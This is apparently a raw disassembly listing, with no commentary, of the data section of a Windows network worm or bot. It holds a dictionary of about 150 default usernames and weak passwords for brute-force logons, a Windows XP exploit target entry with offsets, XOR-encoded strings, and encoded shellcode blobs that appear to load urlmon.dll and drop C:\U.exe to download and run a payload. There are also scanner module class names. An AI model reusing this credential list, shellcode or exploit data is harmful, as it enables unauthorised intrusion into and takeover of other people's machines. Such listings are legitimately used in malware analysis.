dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_423E38 dd 3 ; DATA XREF: sub_40AA15+A1�r
; sub_40AA15+C0�r ...
dword_423E3C dd 7 ; DATA XREF: sub_40AA15+A7�r
; sub_40AA15+C6�r ...
dd 78h
dword_423E44 dd 0Ah ; DATA XREF: sub_40AA15+22�r
; sub_40DCE8+4�r
dd offset dword_41D300
dd offset sub_40B11E
off_423E50 dd offset off_41D38C ; DATA XREF: sub_40BA07+128�o
; J8@F_7_S:00420E40�o ...
align 8
a_?avbad_except db '.?AVbad_exception@std@@',0
dd offset asc_41DD40 ; " ((((( H"
dd offset dword_41DF40+2
off_423E78 dd offset aSun ; DATA XREF: sub_404E21+D9�o
; J8@F_7_S:00423674�o ...
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset dword_41E148+300h
dd 409h, 1, 0
dd offset off_423E78
dword_423F34 dd 2Eh ; DATA XREF: J8@F_7_S:off_423F38�o
off_423F38 dd offset dword_423F34 ; DATA XREF: sub_404E21+14�o
; sub_40C6C4+B�r ...
off_423F3C dd offset dword_426418 ; DATA XREF: sub_40C6C4+1D�r
off_423F40 dd offset dword_426418 ; DATA XREF: sub_40C6C4+2F�r
off_423F44 dd offset dword_426418 ; DATA XREF: sub_40C704+C�r
off_423F48 dd offset dword_426418 ; DATA XREF: sub_40C704+1E�r
off_423F4C dd offset dword_426418 ; DATA XREF: sub_40C704+30�r
off_423F50 dd offset dword_426418 ; DATA XREF: sub_40C704+42�r
off_423F54 dd offset dword_426418 ; DATA XREF: sub_40C704+54�r
off_423F58 dd offset dword_426418 ; DATA XREF: sub_40C704+66�r
off_423F5C dd offset dword_426418 ; DATA XREF: sub_40C704+78�r
dd 2 dup(7F7F7F7Fh), 423F38h, 1, 2Eh, 1, 2 dup(0)
off_423F80 dd offset sub_41059E ; DATA XREF: sub_40D59E:loc_40D5A2�r
; sub_40F70B+5�w
off_423F84 dd offset sub_41059E ; DATA XREF: sub_40F70B+A�w
off_423F88 dd offset sub_41059E ; DATA XREF: sub_40F70B+14�w
off_423F8C dd offset sub_41059E ; DATA XREF: sub_40F70B+1E�w
off_423F90 dd offset sub_41059E ; DATA XREF: sub_40F70B+28�w
off_423F94 dd offset sub_41059E ; DATA XREF: sub_40F70B+32�w
off_423F98 dd offset sub_41059E ; DATA XREF: sub_4069D7+61A�r
; sub_40F70B+37�w
off_423F9C dd offset sub_41059E ; DATA XREF: J8@F_7_S:00409458�r
; sub_40F70B+41�w
off_423FA0 dd offset sub_41059E ; DATA XREF: sub_4069D7+65F�r
; sub_40F70B+4B�w
off_423FA4 dd offset sub_41059E ; DATA XREF: sub_4069D7+640�r
; sub_40F70B+55�w
align 10h
dword_423FB0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_40EC54+2�o
; sub_40EC5D+2�o
dword_423FC0 dd 2694h ; DATA XREF: sub_40FDF4+3�r
; sub_40FE47+5D�r
dd 9875h, 9873h, 0
dword_423FD0 dd 14h ; DATA XREF: sub_40FD56:loc_40FD5E�r
off_423FD4 dd offset aExp ; DATA XREF: sub_40FD56:loc_40FDCE�r
; "exp"
dd 1Dh, 41DC18h, 1Ah, 41DC08h, 1Bh, 41DC0Ch, 1Fh, 41EE10h
dd 13h, 41EE08h, 21h, 41EE00h, 0Eh, 41DC00h, 0Dh, 41DBF8h
dd 0Fh, 41DBDCh, 10h, 41EDF8h, 5, 41EDF0h, 1Eh, 41DBC0h
dd 12h, 41DBBCh, 20h, 41DBB8h, 0Ch, 41DBD4h, 0Bh, 41DBCCh
dd 15h, 41EDE8h, 1Ch, 41DBC4h, 19h, 41EDE0h, 11h, 41EDD8h
dd 18h, 41EDD0h, 16h, 41EDC8h, 17h, 41EDC0h, 22h, 41EDBCh
dd 23h, 41EDB8h, 24h, 41EDB4h, 25h, 41EDACh, 26h, 41EDA0h
dbl_4240B8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20:loc_40FBF0�r
; sub_40FB20:loc_40FBF8�r
dd 0
dd 0FFF80000h
dbl_4240C8 dq 1.797693134862316e308 ; DATA XREF: sub_40FB20+89�r
; sub_40FB20+A4�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_4240E0 dt 2.3562723457267347066e313 ; DATA XREF: sub_410084+B�r
; sub_410084+1E�r
align 4
tbyte_4240EC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_410084+30�r
align 4
dword_4240F8 dd 1 ; DATA XREF: sub_4100DA+1C�r
; sub_4100DA+4C�w
byte_4240FC db 3 ; DATA XREF: sub_4101BD+1B�r
; sub_4101BD:loc_4101FB�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_424110 dd 545350h, 0Fh dup(0) ; DATA XREF: J8@F_7_S:00424190�o
dword_424150 dd 544450h, 0Fh dup(0) ; DATA XREF: J8@F_7_S:00424194�o
dd offset dword_424110
dd offset dword_424150
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch
dword_424218 dd 2 ; DATA XREF: sub_4104DC+13�r
; sub_4104DC+4F�r ...
align 10h
dword_424220 dd 0FFFFFFFEh ; DATA XREF: sub_41144A:loc_411463�r
dword_424224 dd 0FFFFFFFEh ; DATA XREF: sub_4104DC+1B�r
; sub_4104DC:loc_410505�r ...
align 10h
dword_424230 dd 400h ; DATA XREF: sub_411969:loc_411D0D�r
; sub_411969+44D�r
dword_424234 dd 0FFFFFC01h ; DATA XREF: sub_411969:loc_411AD8�r
dword_424238 dd 35h ; DATA XREF: sub_411969+78�r
; sub_411969+176�r ...
dword_42423C dd 0Bh ; DATA XREF: sub_411969:loc_411C74�r
; sub_411969+3AA�r ...
dword_424240 dd 40h ; DATA XREF: sub_411969+519�r
dword_424244 dd 3FFh ; DATA XREF: sub_411969+452�r
; sub_411969:loc_411DCC�r
dword_424248 dd 80h ; DATA XREF: sub_411EAB:loc_41224F�r
; sub_411EAB+44D�r
dword_42424C dd 0FFFFFF81h ; DATA XREF: sub_411EAB:loc_41201A�r
dword_424250 dd 18h ; DATA XREF: sub_411EAB+78�r
; sub_411EAB+176�r ...
dword_424254 dd 8 ; DATA XREF: sub_411EAB:loc_4121B6�r
; sub_411EAB+3AA�r ...
dword_424258 dd 20h ; DATA XREF: sub_411EAB+519�r
dword_42425C dd 7Fh ; DATA XREF: sub_411EAB+452�r
; sub_411EAB:loc_41230E�r
dword_424260 dd 2 dup(0) ; DATA XREF: sub_4123ED+363�o
; sub_412AB1+18E�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_4243C0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_4123ED+37A�o
; sub_412AB1+1B3�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dd offset aBadAllocation ; "bad allocation"
dd offset dword_41EF18
dword_424528 dd 4Eh ; DATA XREF: sub_401F1C+C8�r
; sub_40251A+57�r ...
dd 7 dup(0)
dword_424548 dd 8Bh ; DATA XREF: sub_401F1C+3FE�r
; sub_40251A+77�r ...
dword_42454C dd 0 ; DATA XREF: sub_40251A:loc_40256B�r
; sub_41A8D5+E8�r ...
off_424550 dd offset sub_41A9DE ; DATA XREF: J8@F_7_S:00413C39�r
; J8@F_7_S:00413D4A�r ...
dd 4Dh, 7 dup(0)
dd 599h, 0
dd offset sub_41B1A0
dd 53h, 7 dup(0)
dd 0B97h, 0
dd offset sub_41A8D5
dd 0Bh dup(0)
dd offset aBadAllocatio_0 ; "bad allocation"
dword_4245DC dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_41A5C1+205�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 0
dword_424604 dd 6EB4141h, 501E100Dh, 6D6Dh, 41EF94h ; DATA XREF: sub_41A5C1+2B4�o
dword_424614 dd 5C0D0A00h, 2E2F5Fh ; DATA XREF: sub_41A9DE+4A3�o
dword_42461C dd 0EFFFC481h, 44FFFFh, 41EFA4h ; DATA XREF: sub_41A9DE+321�o
dword_424628 dd 42Ah ; DATA XREF: sub_41A9DE+2CB�r
dword_42462C dd 3E8h ; DATA XREF: sub_41A9DE+4ED�r
dword_424630 dd 258h ; DATA XREF: sub_41A9DE+318�r
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dword_424644 dd 20804h ; DATA XREF: sub_41A9DE+506�r
; sub_41A9DE+512�r ...
dd offset aBadAllocatio_2 ; "bad allocation"
dd offset aBadAllocatio_3 ; "bad allocation"
off_424650 dd offset byte_41EF0B ; DATA XREF: sub_41B1A0:loc_41B27D�r
; sub_41B1A0+EE�o
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin_0 ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem_0 ; "system"
dd offset aServer ; "server"
dd offset aRoot_0 ; "root"
dd offset aNull_1 ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter_0 ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob_0 ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa_0 ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset aXp ; "xp"
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet_0 ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
align 10h
dd offset aBadAllocatio_4 ; "bad allocation"
dd offset aBadAllocatio_5 ; "bad allocation"
dd offset aBadAllocatio_6 ; "bad allocation"
dd offset aBadAllocatio_7 ; "bad allocation"
dd offset aBadAllocatio_8 ; "bad allocation"
dword_424894 dd 22B1C933h, 74D9EED9h, 805BF424h, 8000146Bh, 8300156Bh
; DATA XREF: sub_41411F+78�o
dd 0F3E2FEEBh, 0
dword_4248B0 dd 22B1C933h, 74D9EED9h, 805BF424h, 80001473h, 83001573h
; DATA XREF: sub_41411F+182�o
dd 0F3E2FEEBh, 2 dup(0)
dword_4248D0 dd 758B54EBh, 35748B3Ch, 56F50378h, 320768Bh, 49C933F5h
; DATA XREF: sub_41432A+38�o
dd 0DB33AD41h, 14BE0F36h, 74F23828h, 0DCBC108h, 0EB40DA03h
dd 75DF3BEFh, 5E8B5EE7h, 66DD0324h, 8B4B0C8Bh, 0DD031C5Eh
dd 38B048Bh, 7275C3C5h, 6E6F6D6Ch, 6C6C642Eh, 5C3A4300h
dd 78652E55h, 0C0330065h, 30400364h, 408B0C78h, 1C708B0Ch
dd 8408BADh, 408B09EBh, 7C408D34h, 953C408Bh, 0E4E8EBFh
dd 0FF84E8ECh, 0EC83FFFFh, 242C8304h, 95D0FF3Ch, 1A36BF50h
dd 6FE8702Fh, 8BFFFFFFh, 8DFC2454h, 0DB33BA52h, 0EB525353h
dd 0D0FF5324h, 0FE98BF5Dh, 53E80E8Ah, 83FFFFFFh, 2C8304ECh
dd 0D0FF6224h, 0E0CEEFBFh, 0FF40E860h, 0FF52FFFFh, 0FFD7E8D0h
dd 0FFFFh, 0
dd 0FF000000h, 0FFFF0000h, 0FFFFFF00h, 80000000h, 800000h
dd 8000h, 80h, 4200D0h
dword_4249C0 dd 0 ; DATA XREF: sub_416AE0+6E�r
dword_4249C4 dd 0 ; DATA XREF: sub_416AE0+75�r
dd 0
dd 0FF000000h, 0
dd 0FFFF0000h, 0
dd 0FFFFFF00h, 0
dd 0FFFFFFFFh, 0FF000000h, 0FFFFFFFFh, 0FFFF0000h, 0FFFFFFFFh
dd 0FFFFFF00h, 0FFFFFFFFh
dword_424A00 dd 0 ; DATA XREF: sub_416AE0+8B�r
dword_424A04 dd 80000000h ; DATA XREF: sub_416AE0+91�r
dd 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 80000000h, 0
dd 800000h, 0
dd 8000h, 0
dd 80h, 0
dd offset dword_4200D0+10h
dd offset aBadAllocatio_9 ; "bad allocation"
dword_424A48 dd 0BBEDEDF4h, 0E1F0FBFCh, 0FBBBF6E5h, 0E1F0h, 7Ch dup(0)
; DATA XREF: J8@F_7_S:0041C020�o
dword_424C48 dd 0E5F4A6E7h, 0E7A6h, 7Eh dup(0) ; DATA XREF: J8@F_7_S:0041C01B�o
word_424E48 dw 1D45h ; DATA XREF: J8@F_7_S:loc_41C013�r
align 10h
aHjdxzopvuvmrjf db 'hJdXZOPvUVmRJfVS',0 ; DATA XREF: sub_4196D1:loc_4196FC�o
; sub_4196D1+44�r
align 4
dd 1Bh dup(0)
dword_424ED0 dd 0EDF4B6B6h, 0EDh, 3Eh dup(0) ; DATA XREF: sub_41783D+2A9�o
; sub_41783D+375�o ...
dword_424FD0 dd 0D5EDEDF4h, 0D5h, 4 dup(0) ; DATA XREF: sub_41783D+2FF�o
; sub_41783D+38F�o
byte_424FE8 db 2Eh ; DATA XREF: sub_417676+E4�r
byte_424FE9 db 0B8h, 0EDh, 0 ; DATA XREF: sub_41783D+3A5�o
dd 0Dh dup(0)
db 0
byte_425021 db 0BFh, 0D5h, 0F4h ; DATA XREF: sub_41783D+611�o
dd 0FBBBEDEDh, 0E1F0h, 0Dh dup(0)
db 0
byte_425061 db 0EFh, 0F8h, 0FAh ; DATA XREF: sub_401C1D+60�o
; sub_416F86+B8�o ...
dd 0EDF0BBFBh, 0F0h, 1Dh dup(0)
db 0
byte_4250E1 db 0CFh, 0F8h, 0A5h ; DATA XREF: J8@F_7_S:0041BEC5�o
dd 0FBh, 0Ch dup(0)
db 0
byte_425119 db 0CFh, 2 dup(0) ; DATA XREF: sub_416F86+A4�o
; sub_417119+7C�o ...
dd 40h dup(0)
dword_42521C dd 8 ; DATA XREF: sub_41748B+174�r
; sub_41748B+1B1�r
db 78h, 0Ch
byte_425222 db 1 ; DATA XREF: sub_40177B+8F�r
; sub_4019F3+8F�r
align 4
dd offset aBadAllocati_10 ; "bad allocation"
aGdbdADjmGjZJJN db 'У¤¡¤ÓÑ ×ÐÓ¤¦¬Ñ£¦Ó§Ô¦Ð¦ÐÑÑÐÑÖÐÑ ÐѦ§£¤Ö¤Ô¤ÐÔÓÑЧ¤¢§¥ ££ÑÖÐצӥ'
db 'Ö¢Ó¬£ÔÖ¡¤£¢¥¡Ô¡Ó¡×Ѭ¬Ó¬¤Ó§£ÖÓЦ§Ð×£¤¢¡¦§ צ¢×פ¡Ð×Ô ÔÖ',0
align 4
dd 70h dup(0)
aNbEdGzDdnbgNdZ db '¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ¬¬¤¡Ð ¬Ô¤Ð£××¢¢¡×£¢§§Ó£¬'
; DATA XREF: sub_4019F3+7C�o
db 'У¬¢¢Ô¡¬§Ó¤Ñ¡¦¥¡¢ÑÓ¤¢¡ÖÐ׬Ԭ ÐÔ¡¦Ö×£¡§ §££¢£××Ч¢×ÑÖ Ð¦Ð ',0
align 4
dd 10h dup(0)
dword_425528 dd 0DED6DCDBh, 0 ; DATA XREF: sub_41802F+216�o
; sub_41829C+27�o
db 0
byte_425531 db 0C5h, 0D4h, 0C6h ; DATA XREF: sub_41802F+13E�o
dd 0C6h
db 2 dup(0)
word_42553A dw 0C6C0h ; DATA XREF: sub_41802F+227�o
dd 0C7D0h
db 3 dup(0)
byte_425543 db 0C5h ; DATA XREF: sub_41783D+1CF�o
dd 0D2DBDCh, 0
dword_42554C dd 0D2DBDAC5h, 0 ; DATA XREF: sub_41783D+22F�o
db 0
byte_425555 db 0DEh, 0DCh, 0D6h ; DATA XREF: sub_41783D+1DF�o
dd 0DEh
db 2 dup(0)
word_42555E dw 0DADFh ; DATA XREF: sub_41783D+2EC�o
; sub_41783D+355�o
dd 0DBDCh
db 3 dup(0)
byte_425567 db 0D8h ; DATA XREF: sub_41783D+365�o
dd 0D0D1DAh, 0
dword_425570 dd 0C3DCC7C5h, 0D2C6D8h, 2 dup(0) ; DATA XREF: sub_417361+A4�o
; sub_41783D+1EF�o
dword_425580 dd 0E5E1E1FDh, 0E2BABAAFh, 0F1BBE2E2h, 0F0FEFBF0h, 0F0E3FAFBh
; DATA XREF: sub_41A5C1+123�o
; sub_41A9DE+408�o
dd 0FBF0F1E7h, 0BBFBF0FEh, 0E2BAF9FBh, 0FAF9F7F0h, 0F8FCBAF2h
dd 0E6F0F2F4h, 0FAF8EFBAh, 0EDF0BBFBh, 0F0h, 420350h
dword_4255BC dd 5348h, 4204B8h, 4204D4h, 4206C8h, 4206D8h, 42070Ch
; DATA XREF: sub_418C40+20�o
; sub_418C40+8E�o
dd 42071Ch, 420734h
dword_4255DC dd 80000002h, 80000001h, 420A4Ch ; DATA XREF: sub_419A9F+6B�o
dword_4255E8 dd 0CA975201h, 0A811D059h, 0D5h, 1Dh dup(0) ; DATA XREF: sub_4198D2+3D�o
dd 9, 0C5C1371Dh, 6379AB46h, 8Fh, 1Dh dup(0)
dd 9, 7D8AAFA8h, 0F4BE11C9h, 8, 1Dh dup(0)
dd 9, 9F499642h, 0F537FD4Ah, 0D6h, 1Dh dup(0)
dd 9, 123485E9h, 411291D9h, 12h, 1Dh dup(0)
dd 9, 5EB02EBh, 0FFFFF9E8h, 0FFh, 1Dh dup(0)
dd 9
off_425900 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420E8C�o
; J8@F_7_S:00420EAC�o
align 8
a_?avclsmodule@ db '.?AVclsModule@@',0
off_425918 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420ED4�o
; J8@F_7_S:00420EFC�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_425938 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420F24�o
; J8@F_7_S:00420F48�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_425958 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420DE4�o
; J8@F_7_S:00420F94�o ...
align 10h
a_?avexception@ db '.?AVexception@std@@',0
off_425974 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420F70�o
; J8@F_7_S:00420FC8�o ...
dd 0
a_?avbad_alloc@ db '.?AVbad_alloc@std@@',0
off_425990 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420FF0�o
; J8@F_7_S:00421014�o
align 8
dd 56413F2Eh, 556C646Dh, 40404450h, 0
off_4259A8 dd offset off_41D38C ; DATA XREF: J8@F_7_S:0042103C�o
; J8@F_7_S:00421060�o
align 10h
dd 56413F2Eh, 446C646Dh, 40404Ch
off_4259BC dd offset off_41D38C ; DATA XREF: J8@F_7_S:00421088�o
; J8@F_7_S:004210AC�o
dd 0
a_?avmdlhttpinf db '.?AVmdlHTTPInfo@@',0
align 4
off_4259D8 dd offset off_41D38C ; DATA XREF: J8@F_7_S:004210D4�o
; J8@F_7_S:004210F8�o
align 10h
a_?avmdlnetinfo db '.?AVmdlNetInfo@@',0
align 4
off_4259F4 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00421120�o
; J8@F_7_S:00421144�o
dd 0
a_?avmdlsysinfo db '.?AVmdlSysInfo@@',0
align 10h
off_425A10 dd offset off_41D38C ; DATA XREF: J8@F_7_S:0042116C�o
; J8@F_7_S:00421190�o
align 8
a_?avmdlscansta db '.?AVmdlScanStats@@',0
align 4
off_425A2C dd offset off_41D38C ; DATA XREF: J8@F_7_S:004211B8�o
; J8@F_7_S:004211DC�o
dd 0
a_?avmdlscansto db '.?AVmdlScanStop@@',0
align 4
off_425A48 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00421204�o
; J8@F_7_S:00421228�o
align 10h
a_?avmdlscanner db '.?AVmdlScanner@@',0
align 4
dd 7 dup(0)
dword_425A80 dd 0 ; DATA XREF: sub_402E33+4�w
; sub_402F39+3�r
dword_425A84 dd 0 ; DATA XREF: J8@F_7_S:0041C52A�w
; J8@F_7_S:0041C534�o
align 10h
dword_425A90 dd 0 ; DATA XREF: sub_40304B:loc_40306F�r
; sub_40304B+32�w
dword_425A94 dd 0 ; DATA XREF: J8@F_7_S:00404055�w
; sub_40ABE1:loc_40ABF3�r ...
dd 0
dword_425A9C dd 0 ; DATA XREF: sub_403ED3�r
; sub_40F6C2+15�r ...
dword_425AA0 dd 0 ; DATA XREF: sub_40468E+8F�w
; J8@F_7_S:off_41D3F8�o
dword_425AA4 dd 0 ; DATA XREF: sub_40468E+99�w
dd 0
dword_425AAC dd 0 ; DATA XREF: sub_40468E+8A�w
dd 10h dup(0)
dword_425AF0 dd 0 ; DATA XREF: sub_40468E+BF�w
; sub_40468E+DF�r
align 8
dword_425AF8 dd 0 ; DATA XREF: sub_40468E+7B�w
; J8@F_7_S:0041D3FC�o
dd 22h dup(0)
word_425B84 dw 0 ; DATA XREF: sub_40468E+4F�w
align 4
word_425B88 dw 0 ; DATA XREF: sub_40468E+48�w
align 4
word_425B8C dw 0 ; DATA XREF: sub_40468E+41�w
align 10h
word_425B90 dw 0 ; DATA XREF: sub_40468E+3A�w
align 4
dword_425B94 dd 0 ; DATA XREF: sub_40468E+26�w
dword_425B98 dd 0 ; DATA XREF: sub_40468E+20�w
dword_425B9C dd 0 ; DATA XREF: sub_40468E+1A�w
dword_425BA0 dd 0 ; DATA XREF: sub_40468E+14�w
dword_425BA4 dd 0 ; DATA XREF: sub_40468E+E�w
dword_425BA8 dd 0 ; DATA XREF: sub_40468E+9�w
dword_425BAC dd 0 ; DATA XREF: sub_40468E+60�w
dword_425BB0 dd 0 ; DATA XREF: sub_40468E+68�w
; sub_40468E+85�r
